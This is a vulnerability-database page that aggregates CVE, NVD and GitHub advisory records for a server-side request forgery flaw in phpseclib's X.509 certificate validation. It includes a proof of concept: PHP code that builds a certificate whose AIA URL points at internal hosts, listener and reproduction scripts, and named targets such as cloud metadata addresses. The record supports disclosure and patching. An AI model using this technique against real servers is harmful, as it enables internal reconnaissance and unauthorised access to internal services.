Vulnerability-Lookup

CVE-2026-55599 (GCVE-0-2026-55599)

Vulnerability from cvelistv5 – Published: 2026-06-22 20:00 – Updated: 2026-06-23 16:12

Title

phpseclib: X.509 certificate validation sends attacker-controlled outbound requests (server-side request forgery) via Authority Information Access

Summary

phpseclib is a PHP secure communications library. From 0.1.1 until 1.0.30, 2.0.55, and 3.0.54, when an application validates an untrusted X.509 certificate with phpseclib, X509::validateSignature() reads a URL out of that certificate's Authority Information Access (AIA) extension and connects to it. Attacker who supplies certificate fully controls host, port, and path of that connection. URL fetching is enabled by default, and no destination is blocked. An unauthenticated attacker can therefore make a validating server open connections to internal hosts and ports it should never reach, for example loopback 127.0.0.1, cloud metadata address 169.254.169.254, and internal-only services. This is a server-side request forgery (SSRF) caused by an insecure default. This vulnerability is fixed in 1.0.30, 2.0.55, and 3.0.54.

Severity

5.8 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

SSVC

Exploitation: poc Automatable: yes Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/phpseclib/phpseclib/security/a…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
phpseclib	phpseclib	Affected: >= 0.1.1, < 1.0.30 Affected: >= 2.0.0, < 2.0.55 Affected: >= 3.0.0, < 3.0.54

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-55599",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-23T14:12:41.401298Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-23T16:12:08.949Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "phpseclib",
          "vendor": "phpseclib",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.1.1, \u003c 1.0.30"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.0.0, \u003c 2.0.55"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.0.0, \u003c 3.0.54"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "phpseclib is a PHP secure communications library. From 0.1.1 until 1.0.30, 2.0.55, and 3.0.54, when an application validates an untrusted X.509 certificate with phpseclib, X509::validateSignature() reads a URL out of that certificate\u0027s Authority Information Access (AIA) extension and connects to it. Attacker who supplies certificate fully controls host, port, and path of that connection. URL fetching is enabled by default, and no destination is blocked. An unauthenticated attacker can therefore make a validating server open connections to internal hosts and ports it should never reach, for example loopback 127.0.0.1, cloud metadata address 169.254.169.254, and internal-only services. This is a server-side request forgery (SSRF) caused by an insecure default. This vulnerability is fixed in 1.0.30, 2.0.55, and 3.0.54."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-22T20:00:09.322Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4"
        }
      ],
      "source": {
        "advisory": "GHSA-m557-wrgg-6rp4",
        "discovery": "UNKNOWN"
      },
      "title": "phpseclib: X.509 certificate validation sends attacker-controlled outbound requests (server-side request forgery) via Authority Information Access"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-55599",
    "datePublished": "2026-06-22T20:00:09.322Z",
    "dateReserved": "2026-06-16T23:18:03.170Z",
    "dateUpdated": "2026-06-23T16:12:08.949Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-55599",
      "date": "2026-06-26",
      "epss": "0.00128",
      "percentile": "0.02837"
    },
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"phpseclib: X.509 certificate validation sends attacker-controlled outbound requests (server-side request forgery) via Authority Information Access\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-918\", \"lang\": \"en\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"NONE\", \"baseScore\": 5.8, \"baseSeverity\": \"MEDIUM\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"scope\": \"CHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4\"}], \"affected\": [{\"vendor\": \"phpseclib\", \"product\": \"phpseclib\", \"versions\": [{\"version\": \"\u003e= 0.1.1, \u003c 1.0.30\", \"status\": \"affected\"}, {\"version\": \"\u003e= 2.0.0, \u003c 2.0.55\", \"status\": \"affected\"}, {\"version\": \"\u003e= 3.0.0, \u003c 3.0.54\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-22T20:00:09.322Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"phpseclib is a PHP secure communications library. From 0.1.1 until 1.0.30, 2.0.55, and 3.0.54, when an application validates an untrusted X.509 certificate with phpseclib, X509::validateSignature() reads a URL out of that certificate\u0027s Authority Information Access (AIA) extension and connects to it. Attacker who supplies certificate fully controls host, port, and path of that connection. URL fetching is enabled by default, and no destination is blocked. An unauthenticated attacker can therefore make a validating server open connections to internal hosts and ports it should never reach, for example loopback 127.0.0.1, cloud metadata address 169.254.169.254, and internal-only services. This is a server-side request forgery (SSRF) caused by an insecure default. This vulnerability is fixed in 1.0.30, 2.0.55, and 3.0.54.\"}], \"source\": {\"advisory\": \"GHSA-m557-wrgg-6rp4\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-55599\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-23T14:12:41.401298Z\"}}}], \"references\": [{\"url\": \"https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-23T14:12:06.533Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-55599\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-06-16T23:18:03.170Z\", \"datePublished\": \"2026-06-22T20:00:09.322Z\", \"dateUpdated\": \"2026-06-23T16:12:08.949Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-55599

Vulnerability from fkie_nvd - Published: 2026-06-22 21:16 - Updated: 2026-06-26 20:10

Severity

5.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4	Exploit, Mitigation, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4	Exploit, Mitigation, Vendor Advisory

Impacted products

Vendor	Product	Version
phpseclib	phpseclib	*
phpseclib	phpseclib	*
phpseclib	phpseclib	*

JSON

To clipboard

{
  "affected": [
    {
      "affectedData": [
        {
          "product": "phpseclib",
          "vendor": "phpseclib",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.1.1, \u003c 1.0.30"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.0.0, \u003c 2.0.55"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.0.0, \u003c 3.0.54"
            }
          ]
        }
      ],
      "source": "security-advisories@github.com"
    }
  ],
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:phpseclib:phpseclib:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "904AD9BC-EED0-43F3-80F9-C4617CA0D15F",
              "versionEndExcluding": "1.0.30",
              "versionStartIncluding": "0.1.1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:phpseclib:phpseclib:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BEE9570-5BD0-4C69-B435-B8CB4EFFB05A",
              "versionEndExcluding": "2.0.55",
              "versionStartIncluding": "2.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:phpseclib:phpseclib:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "97CEDD42-244C-42D8-8BCC-AB611550E504",
              "versionEndExcluding": "3.0.54",
              "versionStartIncluding": "3.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "phpseclib is a PHP secure communications library. From 0.1.1 until 1.0.30, 2.0.55, and 3.0.54, when an application validates an untrusted X.509 certificate with phpseclib, X509::validateSignature() reads a URL out of that certificate\u0027s Authority Information Access (AIA) extension and connects to it. Attacker who supplies certificate fully controls host, port, and path of that connection. URL fetching is enabled by default, and no destination is blocked. An unauthenticated attacker can therefore make a validating server open connections to internal hosts and ports it should never reach, for example loopback 127.0.0.1, cloud metadata address 169.254.169.254, and internal-only services. This is a server-side request forgery (SSRF) caused by an insecure default. This vulnerability is fixed in 1.0.30, 2.0.55, and 3.0.54."
    }
  ],
  "id": "CVE-2026-55599",
  "lastModified": "2026-06-26T20:10:05.340",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ],
    "ssvcV203": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "ssvcData": {
          "id": "CVE-2026-55599",
          "options": [
            {
              "exploitation": "poc"
            },
            {
              "automatable": "yes"
            },
            {
              "technicalImpact": "partial"
            }
          ],
          "role": "CISA Coordinator",
          "timestamp": "2026-06-23T14:12:41.401298Z",
          "version": "2.0.3"
        }
      }
    ]
  },
  "published": "2026-06-22T21:16:25.903",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/phpseclib/phpseclib/security/advisories/GHSA-m557-wrgg-6rp4"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-M557-WRGG-6RP4

Vulnerability from github – Published: 2026-06-16 15:03 – Updated: 2026-06-16 15:03

Summary

phpseclib: X.509 certificate validation sends attacker-controlled outbound requests (server-side request forgery) via Authority Information Access

Details

Summary

When an application validates an untrusted X.509 certificate with phpseclib, X509::validateSignature() reads a URL out of that certificate's Authority Information Access (AIA) extension and connects to it. Attacker who supplies certificate fully controls host, port, and path of that connection. URL fetching is enabled by default, and no destination is blocked. An unauthenticated attacker can therefore make a validating server open connections to internal hosts and ports it should never reach, for example loopback 127.0.0.1, cloud metadata address 169.254.169.254, and internal-only services. This is a server-side request forgery (SSRF) caused by an insecure default. It is reproducible on current released LTS 3.0.53 and on 4.0 development line.

Details

When no already-trusted certificate authority is the issuer of certificate under validation, validateSignatureCountable() continues to AIA fetching. Default for validateSignature() is caonly = true:

// phpseclib/File/X509.php:1316-1327 (4.0 development line, commit 74ada1a6)
if (!isset($signingCert)) {
    if ($caonly) {
        return $this->testForIntermediate(true, $count) && $this->validateSignature(true);
    } else {
        try {
            $this->testForSelfSigned();
            $signingCert = $this;
        } catch (BadMethodCallException) {
            return $this->testForIntermediate(true, $count) && $this->validateSignature(true);
        }
    }
}

testForIntermediate() takes URL straight out of certificate's AIA caIssuers field and fetches it. Value comes directly from certificate content and is never restricted:

// phpseclib/File/X509.php:1357-1391 (4.0 development line)
$opts = $this->getExtension('id-pe-authorityInfoAccess');
...
foreach ($opts['extnValue'] as $opt) {
    if ($opt['accessMethod'] == 'id-ad-caIssuers') {
        if (isset($opt['accessLocation']['uniformResourceIdentifier'])) {
            $url = (string) $opt['accessLocation']['uniformResourceIdentifier']; // attacker controlled
            break;
        }
    }
}
...
$cert = static::fetchURL($url); // server-side request forgery

fetchURL() connects to attacker host and port. There is no destination validation: no block on loopback, link-local, private, or metadata ranges, and no port restriction:

// phpseclib/File/X509.php:1456-1476 (4.0 development line)
private static function fetchURL(string $url): ?string
{
    if (self::$disable_url_fetch) {  // default false, so fetching happens
        return null;
    }
    $parts = parse_url($url);
    switch ($parts['scheme']) {
        case 'http':
            $fsock = @fsockopen($parts['host'], $parts['port'] ?? 80); // attacker host and port
            ...
            fputs($fsock, "GET $path HTTP/1.0\r\n");
            fputs($fsock, "Host: $parts[host]\r\n\r\n");

Fetching is on by default:

// phpseclib/File/X509.php:110 (4.0 development line)
private static bool $disable_url_fetch = false;

Same default-enabled logic exists in released 3.0.x. In 3.0.53 it sits at $disable_url_fetch = false on line 255 and fsockopen($parts['host'], ...) on line 1136 of phpseclib/File/X509.php.

Why this is a vulnerability and not merely a feature. AIA chasing is a legitimate capability described by RFC 4325, and this report does not claim fetching is wrong in itself. Vulnerability is the combination of three properties that together match definition of SSRF:

URL comes from untrusted input. It is read out of certificate that an application is trying to validate, which is exactly the data an attacker controls.
Fetching is enabled by default. An integrator who simply calls validateSignature() gets outbound requests with no opt-in. Only control, X509::disableURLFetch(), is off by default, so secure behaviour requires knowing about and calling a method that most callers never see.
No destination is restricted. Loopback, private ranges, link-local metadata, and arbitrary ports are all reachable. Mature implementations of AIA fetching restrict destinations precisely to prevent this.

Reachability is not narrow. Fetch triggers whenever certificate's issuer is not already trusted, which an attacker arranges trivially by choosing any issuer name that is not in trust store. Having certificate authorities loaded does not protect a target: an attacker certificate that claims an unknown issuer still reaches testForIntermediate().

Response handling is blind. Fetched body is used only if it parses as a certificate, and is otherwise discarded, so an attacker does not directly read internal responses through this path. That limits confidentiality impact but does not remove request-forgery and reconnaissance capability.

PoC

Two reproductions follow: current released LTS 3.0.53, and 4.0 development line. Malicious certificate is plain PEM and is identical for both, since certificate format is the same across versions.

Build malicious certificate once (this uses 4.0 to build, but any tool that emits an X.509 certificate with an AIA caIssuers URL works):

composer require phpseclib/phpseclib:4.0.x-dev

<?php
require 'vendor/autoload.php';

use phpseclib4\Crypt\RSA;
use phpseclib4\File\X509;

$url = 'http://127.0.0.1:19090/ssrf';

$key  = RSA::createKey(2048)->withPadding(RSA::SIGNATURE_PKCS1)->withHash('sha256');
$cert = new X509($key->getPublicKey());
$cert->addDNProp('id-at-commonName', 'attacker-leaf.example');
$cert->setEndDate('lifetime');
$cert->setExtension('id-pe-authorityInfoAccess', [
    ['accessMethod' => 'id-ad-caIssuers',
     'accessLocation' => ['uniformResourceIdentifier' => $url]],
]);
$key->sign($cert);
file_put_contents('attacker_cert.pem', (string) $cert);

Stand up a listener that represents an internal service on a port that is not otherwise reachable from outside:

php -r '$s=stream_socket_server("tcp://127.0.0.1:19090",$e,$m);$c=stream_socket_accept($s,20);echo fread($c,4096);'

Reproduction on released LTS 3.0.53. Install it and have an application validate certificate:

composer require phpseclib/phpseclib:~3.0.0

<?php
require 'vendor/autoload.php';

use phpseclib3\File\X509;

$v = new X509();
$v->loadX509(file_get_contents('attacker_cert.pem'));
$v->validateSignature();   // connects to 127.0.0.1:19090 during validation

Reproduction on 4.0 development line. Same certificate, 4.0 namespace:

<?php
require 'vendor/autoload.php';

use phpseclib4\File\X509;

X509::clearCAStore();      // attacker cert issuer is not trusted
$v = X509::load(file_get_contents('attacker_cert.pem'));
$v->validateSignature();   // connects to 127.0.0.1:19090 during validation

Observed result, on both 3.0.53 and 4.0.x-dev. Listener receives a request whose host, port, and path all come from certificate, even though validateSignature() returns false:

GET /ssrf HTTP/1.0
Host: 127.0.0.1

This was also confirmed end to end over HTTP: an unauthenticated POST of certificate to an endpoint that calls loadX509() then validateSignature() makes server connect outbound to attacker-chosen 127.0.0.1:19090. Changing host and port in certificate reaches any internal address and port, for example 169.254.169.254 or 127.0.0.1:6379.

Negative control. With X509::disableURLFetch() set before validation, validation returns false and no outbound connection is made. This confirms both root cause and that default-on behaviour is the trigger.

Impact

This is a server-side request forgery (CWE-918) caused by an insecure default (CWE-276): URL fetching is enabled by default and applies no destination restrictions while acting on untrusted certificate content.

An application is affected when it validates an attacker-influenced certificate, which covers client-certificate checks implemented in PHP, S/MIME and CMS signer verification, document and code-signing validation, and any feature that verifies an uploaded or pasted certificate. No authentication and no user interaction are needed.

What an attacker gains:

Internal reconnaissance and port scanning. Connection success or failure and timing reveal which internal hosts and ports respond.
Interaction with internal-only HTTP services such as admin panels, dashboards, and webhooks bound to loopback or private ranges.
Requests to cloud metadata endpoints such as 169.254.169.254, which answer plain HTTP GET on some providers.

Because fetch is blind, an attacker does not read internal response bodies through this path directly, so this is a request-forgery and reconnaissance primitive rather than direct disclosure of internal data. Any reflective sink elsewhere in an application, or any internal endpoint that performs an action on a GET, increases real impact.

Suggested fix, strongest first: default disableURLFetch to true so AIA chasing is opt-in; if it stays enabled, validate destinations inside fetchURL() by rejecting loopback, link-local, and private addresses and restricting ports, and add an egress policy callback similar to existing setCRLLookupCallback(); and state plainly in documentation that validating an untrusted certificate can cause outbound requests to URLs found inside that certificate.

Severity

5.8 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.29"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpseclib/phpseclib"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.1.1"
            },
            {
              "fixed": "1.0.30"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.0.54"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpseclib/phpseclib"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.0.55"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.53"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpseclib/phpseclib"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.0.54"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T15:03:58Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nWhen an application validates an untrusted X.509 certificate with phpseclib, **X509::validateSignature()** reads a URL out of that certificate\u0027s Authority Information Access (AIA) extension and connects to it. Attacker who supplies certificate fully controls host, port, and path of that connection. URL fetching is enabled by default, and no destination is blocked. An unauthenticated attacker can therefore make a validating server open connections to internal hosts and ports it should never reach, for example loopback **127.0.0.1**, cloud metadata address **169.254.169.254**, and internal-only services. This is a server-side request forgery (SSRF) caused by an insecure default. It is reproducible on current released LTS 3.0.53 and on 4.0 development line.\n\n### Details\n\nWhen no already-trusted certificate authority is the issuer of certificate under validation, **validateSignatureCountable()** continues to AIA fetching. Default for **validateSignature()** is **caonly = true**:\n\n```\n// phpseclib/File/X509.php:1316-1327 (4.0 development line, commit 74ada1a6)\nif (!isset($signingCert)) {\n    if ($caonly) {\n        return $this-\u003etestForIntermediate(true, $count) \u0026\u0026 $this-\u003evalidateSignature(true);\n    } else {\n        try {\n            $this-\u003etestForSelfSigned();\n            $signingCert = $this;\n        } catch (BadMethodCallException) {\n            return $this-\u003etestForIntermediate(true, $count) \u0026\u0026 $this-\u003evalidateSignature(true);\n        }\n    }\n}\n```\n\n**testForIntermediate()** takes URL straight out of certificate\u0027s AIA caIssuers field and fetches it. Value comes directly from certificate content and is never restricted:\n\n```\n// phpseclib/File/X509.php:1357-1391 (4.0 development line)\n$opts = $this-\u003egetExtension(\u0027id-pe-authorityInfoAccess\u0027);\n...\nforeach ($opts[\u0027extnValue\u0027] as $opt) {\n    if ($opt[\u0027accessMethod\u0027] == \u0027id-ad-caIssuers\u0027) {\n        if (isset($opt[\u0027accessLocation\u0027][\u0027uniformResourceIdentifier\u0027])) {\n            $url = (string) $opt[\u0027accessLocation\u0027][\u0027uniformResourceIdentifier\u0027]; // attacker controlled\n            break;\n        }\n    }\n}\n...\n$cert = static::fetchURL($url); // server-side request forgery\n```\n\n**fetchURL()** connects to attacker host and port. There is no destination validation: no block on loopback, link-local, private, or metadata ranges, and no port restriction:\n\n```\n// phpseclib/File/X509.php:1456-1476 (4.0 development line)\nprivate static function fetchURL(string $url): ?string\n{\n    if (self::$disable_url_fetch) {  // default false, so fetching happens\n        return null;\n    }\n    $parts = parse_url($url);\n    switch ($parts[\u0027scheme\u0027]) {\n        case \u0027http\u0027:\n            $fsock = @fsockopen($parts[\u0027host\u0027], $parts[\u0027port\u0027] ?? 80); // attacker host and port\n            ...\n            fputs($fsock, \"GET $path HTTP/1.0\\r\\n\");\n            fputs($fsock, \"Host: $parts[host]\\r\\n\\r\\n\");\n```\n\nFetching is on by default:\n\n```\n// phpseclib/File/X509.php:110 (4.0 development line)\nprivate static bool $disable_url_fetch = false;\n```\n\nSame default-enabled logic exists in released 3.0.x. In 3.0.53 it sits at **$disable_url_fetch = false** on line 255 and **fsockopen($parts[\u0027host\u0027], ...)** on line 1136 of **phpseclib/File/X509.php**.\n\nWhy this is a vulnerability and not merely a feature. AIA chasing is a legitimate capability described by RFC 4325, and this report does not claim fetching is wrong in itself. Vulnerability is the combination of three properties that together match definition of SSRF:\n\n1. URL comes from untrusted input. It is read out of certificate that an application is trying to validate, which is exactly the data an attacker controls.\n2. Fetching is enabled by default. An integrator who simply calls **validateSignature()** gets outbound requests with no opt-in. Only control, **X509::disableURLFetch()**, is off by default, so secure behaviour requires knowing about and calling a method that most callers never see.\n3. No destination is restricted. Loopback, private ranges, link-local metadata, and arbitrary ports are all reachable. Mature implementations of AIA fetching restrict destinations precisely to prevent this.\n\nReachability is not narrow. Fetch triggers whenever certificate\u0027s issuer is not already trusted, which an attacker arranges trivially by choosing any issuer name that is not in trust store. Having certificate authorities loaded does not protect a target: an attacker certificate that claims an unknown issuer still reaches **testForIntermediate()**.\n\nResponse handling is blind. Fetched body is used only if it parses as a certificate, and is otherwise discarded, so an attacker does not directly read internal responses through this path. That limits confidentiality impact but does not remove request-forgery and reconnaissance capability.\n\n### PoC\n\nTwo reproductions follow: current released LTS 3.0.53, and 4.0 development line. Malicious certificate is plain PEM and is identical for both, since certificate format is the same across versions.\n\nBuild malicious certificate once (this uses 4.0 to build, but any tool that emits an X.509 certificate with an AIA caIssuers URL works):\n\n```\ncomposer require phpseclib/phpseclib:4.0.x-dev\n```\n\n```php\n\u003c?php\nrequire \u0027vendor/autoload.php\u0027;\n\nuse phpseclib4\\Crypt\\RSA;\nuse phpseclib4\\File\\X509;\n\n$url = \u0027http://127.0.0.1:19090/ssrf\u0027;\n\n$key  = RSA::createKey(2048)-\u003ewithPadding(RSA::SIGNATURE_PKCS1)-\u003ewithHash(\u0027sha256\u0027);\n$cert = new X509($key-\u003egetPublicKey());\n$cert-\u003eaddDNProp(\u0027id-at-commonName\u0027, \u0027attacker-leaf.example\u0027);\n$cert-\u003esetEndDate(\u0027lifetime\u0027);\n$cert-\u003esetExtension(\u0027id-pe-authorityInfoAccess\u0027, [\n    [\u0027accessMethod\u0027 =\u003e \u0027id-ad-caIssuers\u0027,\n     \u0027accessLocation\u0027 =\u003e [\u0027uniformResourceIdentifier\u0027 =\u003e $url]],\n]);\n$key-\u003esign($cert);\nfile_put_contents(\u0027attacker_cert.pem\u0027, (string) $cert);\n```\n\nStand up a listener that represents an internal service on a port that is not otherwise reachable from outside:\n\n```\nphp -r \u0027$s=stream_socket_server(\"tcp://127.0.0.1:19090\",$e,$m);$c=stream_socket_accept($s,20);echo fread($c,4096);\u0027\n```\n\nReproduction on released LTS 3.0.53. Install it and have an application validate certificate:\n\n```\ncomposer require phpseclib/phpseclib:~3.0.0\n```\n\n```php\n\u003c?php\nrequire \u0027vendor/autoload.php\u0027;\n\nuse phpseclib3\\File\\X509;\n\n$v = new X509();\n$v-\u003eloadX509(file_get_contents(\u0027attacker_cert.pem\u0027));\n$v-\u003evalidateSignature();   // connects to 127.0.0.1:19090 during validation\n```\n\nReproduction on 4.0 development line. Same certificate, 4.0 namespace:\n\n```php\n\u003c?php\nrequire \u0027vendor/autoload.php\u0027;\n\nuse phpseclib4\\File\\X509;\n\nX509::clearCAStore();      // attacker cert issuer is not trusted\n$v = X509::load(file_get_contents(\u0027attacker_cert.pem\u0027));\n$v-\u003evalidateSignature();   // connects to 127.0.0.1:19090 during validation\n```\n\nObserved result, on both 3.0.53 and 4.0.x-dev. Listener receives a request whose host, port, and path all come from certificate, even though **validateSignature()** returns false:\n\n```\nGET /ssrf HTTP/1.0\nHost: 127.0.0.1\n```\n\nThis was also confirmed end to end over HTTP: an unauthenticated POST of certificate to an endpoint that calls **loadX509()** then **validateSignature()** makes server connect outbound to attacker-chosen **127.0.0.1:19090**. Changing host and port in certificate reaches any internal address and port, for example **169.254.169.254** or **127.0.0.1:6379**.\n\nNegative control. With **X509::disableURLFetch()** set before validation, validation returns false and no outbound connection is made. This confirms both root cause and that default-on behaviour is the trigger.\n\n### Impact\n\nThis is a server-side request forgery (CWE-918) caused by an insecure default (CWE-276): URL fetching is enabled by default and applies no destination restrictions while acting on untrusted certificate content.\n\nAn application is affected when it validates an attacker-influenced certificate, which covers client-certificate checks implemented in PHP, S/MIME and CMS signer verification, document and code-signing validation, and any feature that verifies an uploaded or pasted certificate. No authentication and no user interaction are needed.\n\nWhat an attacker gains:\n\n- Internal reconnaissance and port scanning. Connection success or failure and timing reveal which internal hosts and ports respond.\n- Interaction with internal-only HTTP services such as admin panels, dashboards, and webhooks bound to loopback or private ranges.\n- Requests to cloud metadata endpoints such as **169.254.169.254**, which answer plain HTTP GET on some providers.\n\nBecause fetch is blind, an attacker does not read internal response bodies through this path directly, so this is a request-forgery and reconnaissance primitive rather than direct disclosure of internal data. Any reflective sink elsewhere in an application, or any internal endpoint that performs an action on a GET, increases real impact.\n\nSuggested fix, strongest first: default **disableURLFetch** to true so AIA chasing is opt-in; if it stays enabled, validate destinations inside **fetchURL()** by rejecting loopback, link-local, and private addresses and restricting ports, and add an 